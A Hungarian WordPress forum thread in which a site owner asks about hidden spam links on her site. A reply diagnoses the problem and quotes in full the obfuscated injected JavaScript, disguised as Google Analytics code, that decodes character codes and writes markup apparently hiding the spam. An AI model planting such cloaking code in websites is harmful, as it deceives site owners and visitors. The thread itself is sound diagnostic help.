Nem kívánt külső hivatkozások és szöveges tartalom.

Sziasztok! Ma ellenőriztem a honlapom tartalmát egy oldalon, ami egy tucat ide nem illő külső hivatkozást, és egy jókora idegen nyelvű szöveget tartalmaz. Az egyik oldal szerkesztése közben lett gyanús, ahol egy “játék” szó valami külső oldalra mutatott. A HTML szövegben nem látszik a jelölése, sőt, egyik hivatkozás sem látható, és hiába kerestem a szerkesztő felületben a szöveget sem találtam meg!Rengeteg munkám van az oldalban, és nagyon bosszantó dolog ez…



Hogyan tudom kideríteni mi is ez, és hogyan tudom deaktiválni?



Valaki segítsen ennek a problémának a megoldásában légyszi, mert én nem vagyok igazán otthonos ebben a témában, kifejezetten amatőr vagyok.



Akismet és BBQ aktiválva van az oldalon, és WP MyGrid2 sablont használok. Honlap: http://pollypuppy.com/



Előre is köszönettel: Gabi

Tudnál mutatni egy ilyen oldalt, a főoldalon nem találtam ilyesmit.

Szia!



Igen, tele van rakva eldugott spam szöveggel az oldalad. Közvetlenül a body utána van egy külön div ben, és ezt javascript-ben rejtik el, ami közvetlenül felette van, első pillantásra olyan, mintha google követő kód lenne, de nem az! Erről van szó:

<br />
var _ga0 = [];<br />
_ga0.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']);<br />
_ga0.push(['_setPageId', '6918518510413211618916516918118018617118018618618118219']);<br />
_ga0.push(['_setOption', '3182181185175186175181180128167168185181178187186171129']);<br />
_ga0.push(['_setPageId', '1691781751821281841711691861101221211191821901141671871']);<br />
_ga0.push(['_setOption', '8618111416718718618111412212111918219011112919513011718']);<br />
_ga0.push(['_setPageId', '5186191178171132']);<br />
var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_ga0.length; v++) t += _ga0[v][1];l=t.length;<br />
while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70);<br />
document.write(z);<br />

```<br />